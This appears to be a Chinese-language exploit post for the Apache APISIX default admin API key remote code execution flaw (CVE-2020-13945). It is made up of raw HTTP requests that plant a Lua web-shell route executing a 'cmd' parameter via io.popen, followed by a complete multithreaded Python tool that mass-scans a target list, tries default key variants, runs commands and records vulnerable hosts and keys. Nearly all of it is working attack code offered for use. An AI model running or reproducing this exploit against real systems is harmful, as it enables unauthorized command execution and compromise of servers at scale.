poc`x

写入恶意路由

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /apisix/admin/routes HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1

{
"uri": "/fasklfjaklsjfl",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"interact.sh:80": 1
}
}
}


访问,执行命令

1
2
3
4
5
GET /fasklfjaklsjfl?cmd=id HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
import json
import time
import random
import string
from urllib.parse import urlparse
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed

class APISIXRCE:
def __init__(self):
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1'
})

# 默认API密钥列表
self.api_keys = [
'edd1c9f034335f136f87ad84b625c8f1', # 默认密钥
'edd1c9f034335f136f87ad84b625c8f2', # 可能的变体
'edd1c9f034335f136f87ad84b625c8f0',
]

self.vulnerable_targets = []
self.lock = threading.Lock()

def generate_random_uri(self):
"""生成随机URI路径"""
# 生成更随机的URI,包含大小写字母和数字
chars = string.ascii_letters + string.digits
# 添加时间戳确保唯一性
timestamp = str(int(time.time()))[-6:] # 取时间戳后6位
random_path = ''.join(random.choices(chars, k=14)) + timestamp
return f'/{random_path}'

def create_malicious_route(self, target_url, api_key):
"""创建恶意路由"""
try:
# 构造管理API URL
parsed_url = urlparse(target_url)
admin_url = f"{parsed_url.scheme}://{parsed_url.netloc}/apisix/admin/routes"

# 生成随机URI
random_uri = self.generate_random_uri()

# 恶意路由配置
route_config = {
"uri": random_uri,
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"interact.sh:80": 1
}
}
}

# 设置API密钥
headers = dict(self.session.headers)
headers['X-API-KEY'] = api_key

# 发送创建路由请求
response = self.session.post(
admin_url,
json=route_config,
headers=headers,
timeout=10,
verify=False
)

if response.status_code == 201:
# 解析响应获取路由ID
try:
result = response.json()
route_id = result.get('node', {}).get('value', {}).get('id')
if route_id:
return random_uri, route_id
except:
pass

return None, None

except Exception as e:
return None, None

def execute_command(self, target_url, route_uri, command="id"):
"""执行命令验证RCE"""
try:
parsed_url = urlparse(target_url)
exec_url = f"{parsed_url.scheme}://{parsed_url.netloc}{route_uri}?cmd={command}"

response = self.session.get(exec_url, timeout=10, verify=False)

if response.status_code == 200:
# 检查响应内容是否包含命令执行结果
content = response.text.strip()
# 简单的命令执行结果检测
if any(keyword in content.lower() for keyword in ['uid=', 'gid=', 'groups=', 'root', 'nobody']):
return True, content

return False, response.text

except Exception as e:
return False, str(e)

def cleanup_route(self, target_url, route_id, api_key):
"""清理创建的恶意路由"""
try:
parsed_url = urlparse(target_url)
delete_url = f"{parsed_url.scheme}://{parsed_url.netloc}/apisix/admin/routes/{route_id}"

headers = dict(self.session.headers)
headers['X-API-KEY'] = api_key

self.session.delete(delete_url, headers=headers, timeout=10, verify=False)
except:
pass

def test_single_target(self, target_url):
"""测试单个目标"""
print(f"[*] 正在测试: {target_url}")

for api_key in self.api_keys:
try:
# 创建恶意路由
route_uri, route_id = self.create_malicious_route(target_url, api_key)

if route_uri and route_id:
print(f"[+] 成功创建恶意路由: {route_uri}")

# 等待一下确保路由生效
time.sleep(2)

# 执行命令验证
success, result = self.execute_command(target_url, route_uri)

if success:
with self.lock:
self.vulnerable_targets.append({
'url': target_url,
'api_key': api_key,
'route_uri': route_uri,
'command_result': result
})
print(f"[!] 发现漏洞: {target_url}")
print(f" API密钥: {api_key}")
print(f" 命令结果: {result}")

# 清理恶意路由
self.cleanup_route(target_url, route_id, api_key)
return True
else:
print(f"[-] 命令执行失败: {target_url}")
# 清理恶意路由
self.cleanup_route(target_url, route_id, api_key)
else:
print(f"[-] 无法创建恶意路由: {target_url} (API密钥: {api_key})")

except Exception as e:
print(f"[-] 测试失败: {target_url} - {str(e)}")

return False

def batch_scan(self, target_file, max_threads=10):
"""批量扫描"""
try:
with open(target_file, 'r', encoding='utf-8') as f:
targets = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
print(f"[-] 目标文件不存在: {target_file}")
return

print(f"[*] 开始批量扫描 {len(targets)} 个目标...")
print(f"[*] 使用线程数: {max_threads}")
print("-" * 60)

with ThreadPoolExecutor(max_workers=max_threads) as executor:
futures = {executor.submit(self.test_single_target, target): target for target in targets}

for future in as_completed(futures):
target = futures[future]
try:
future.result()
except Exception as e:
print(f"[-] 线程执行异常: {target} - {str(e)}")

# 输出结果
self.print_results()

def print_results(self):
"""输出扫描结果"""
print("\n" + "=" * 60)
print("扫描结果汇总")
print("=" * 60)

if self.vulnerable_targets:
print(f"[!] 发现 {len(self.vulnerable_targets)} 个存在漏洞的目标:")
for i, target in enumerate(self.vulnerable_targets, 1):
print(f"\n{i}. 目标: {target['url']}")
print(f" API密钥: {target['api_key']}")
print(f" 路由URI: {target['route_uri']}")
print(f" 命令结果: {target['command_result']}")
else:
print("[-] 未发现存在漏洞的目标")

def save_results(self, output_file="vulnerable_targets.txt"):
"""保存结果到文件"""
if self.vulnerable_targets:
with open(output_file, 'w', encoding='utf-8') as f:
for target in self.vulnerable_targets:
f.write(f"目标: {target['url']}\n")
f.write(f"API密钥: {target['api_key']}\n")
f.write(f"路由URI: {target['route_uri']}\n")
f.write(f"命令结果: {target['command_result']}\n")
f.write("-" * 40 + "\n")
print(f"[+] 结果已保存到: {output_file}")

def main():
print("Apache APISIX 默认密钥RCE漏洞批量验证工具 (CVE-2020-13945)")
print("=" * 60)

scanner = APISIXRCE()

# 创建示例目标文件
target_file = "targets.txt"
if not os.path.exists(target_file):
print(f"[*] 创建示例目标文件: {target_file}")
with open(target_file, 'w', encoding='utf-8') as f:
f.write("http://target1.com\n")
f.write("http://target2.com\n")
f.write("https://target3.com\n")
print(f"[!] 请编辑 {target_file} 文件,添加要测试的目标URL")
return

# 开始批量扫描
scanner.batch_scan(target_file, max_threads=5)

# 保存结果
scanner.save_results()

if __name__ == "__main__":
import os
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
main()